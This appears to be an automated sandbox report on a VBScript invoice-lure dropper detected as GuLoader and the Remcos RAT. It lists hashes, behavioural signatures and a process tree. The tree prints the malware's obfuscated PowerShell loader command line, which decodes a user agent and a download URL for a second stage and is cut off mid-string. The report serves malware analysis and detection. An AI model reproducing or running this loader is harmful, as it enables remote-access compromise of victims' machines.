Edit tour
Windows
Analysis Report
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
Overview
General Information
Sample name: | IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsrenamed because original name is a hash value |
Original sample name: | IMGRO Facturi nepltite 56773567583658567835244234Bandido.vbs |
Analysis ID: | 1538533 |
MD5: | a8da570deac5f16a0050802c0da5d7dd |
SHA1: | 9d8992e3770e41d8a431350e1cef73492dc240ea |
SHA256: | c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d |
Tags: | vbsuser-lowmal3 |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7768 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\IMGRO Facturi n epl#U0103t ite 567735 6758365856 7835244234 Bandido.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 7808 cmdline:
ping gorme zl_6777.67 77.6777.67 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7876 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Servic etilbuds F angerne Si dsernes Co rmidium Br nesangen P outy #>;$T redjeverde nslandets= 'Bilberrie s43';<#Eft erordenes fjedervgt Soubretten s leftism Radiograph y #>;$Salt vandsfisk= $selvvirke ndes+$host .UI; funct ion pepper iness($Kla ssesttet){ If ($Saltv andsfisk) {$Envisagi ng++;}$pos sesses=$Un limned+$Kl assesttet. 'Length'-$ Envisaging ; for( $Mu lticiliate d=4;$Multi ciliated - lt $posses ses;$Multi ciliated+= 5){$Aithoc hroi56=$Mu lticiliate d;$Politis koler+=$Kl assesttet[ $Multicili ated];$Opb yggeligste ='Weltansc hauung';}$ Politiskol er;}functi on Isopor( $jomfrunal ske){ & ($Hovedkar akterer) ( $jomfrunal ske);}$Fol keskoleomr aadet=pepp eriness 'I solMAnlgoE ffez noriE ssolGangli n,ta Lig/ Bl, ';$Fol keskoleomr aadet+=pep periness ' Refr5ra e. Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKults Fedt igN avT Ten fi .1slay0Tho m.Unde0Sta v;Ahop Lo iW teriKra vnKurs6Sis .4Engr;Tan k HjrxOpti 6Rhyp4Incr ; ete Tras rGeo v ,es : yr1Dile3 Tai1 Bio. alg0 Pos) Perp ForsG OuteMaanc Zan.kCatho Bart/ Che2 Vold0Pauc1 Sluk0 Chi0 S a1 ea0w .re1Prog G ynoFBelviL okar ndeeL egefHe soN onrxNett/h alv1,eta3K u m1Data.U pbu0 Gui ' ;$Efterord s=pepperin ess 'Diktu PhotsOverE orlrK.od- Job aForbg KofeSy,bn RisitProg ';$Ordreaf givelser=p epperiness 'UnmehTel etGrost en pImplsUdtr :Sols/Mora /Kanopov r lP rsi All eSenslFors tBlyadB,nz .Hy.etbil, oR afpBakk /BeasT isc lUdtnlChil e B esIdio 1Barb8glut 7Time.F,ag dMadke S l pDokul In oSendySubc ';$haole= pepperines s 'tetr>We ls ';$Hove dkaraktere r=pepperin ess 'CockI dumhe SinX Anse ';$Ko ntrahering ='Tekstlig ';$Jackham mer='\Clot hesman.Vin ';Isopor ( pepperines s 'Thig$ B raGStemlCo rdoMarvBPo staEthiLCi bo:OverE p sVTe.meJag tLSatiE,ea seDe enArm hs Asp=Uni t$Brute Ot tnS utVexp r:T,veaEnc rp HaaP on dalfaAPe s T HofAsymp +Bobs$ Kvs j En AMata cMisakNote H,orlaTome MPeptMPres e oldRBus ');Isopor (pepperine ss 'Hard$U nd gSociLT veto WoobP ar anotal ead:SkamfH estoUdsiRD raiMDissA A tlpo,yID is SKramea rt S Sen=C hil$disiOW orrr eaDDe moR MaeEFi geaF gef D rag limIRe .rvForaECu ralEd csRe olEKobbr C la.StatS,l ebp LisL L anIBoggtS ag(H,po$Se mihMa,iASn ito.onpLOc treacet)To ld ');Isop or (pepper iness ' Un d[Swifnsta bETsumT.ag t.ForuSGen eERadircem ev StriTil nC .ekEOct opRed.oKle iI Sa NGav .T bscM,kr aAUnclNBnn ea,nnigPh, ce MolR nr t] B,l:Suc c:MusksPro gev.rdcSt. aUFl.tRd n dI FlytJay wYjvnfpPar aRWineOInf ithummoDol ocRom oSig nLMidt Cec r=Foru Exc r[Kaian.em ie.lgttU r u. RhasH,r peve,ecEnd iuAsteRPro iLallT eg eYTuvaPT a nroutgoFar mT TabODyr lcStauOBob bL StuTVoi cy ussPU s aeAtio]Oec ,:grat: es stMidnlcht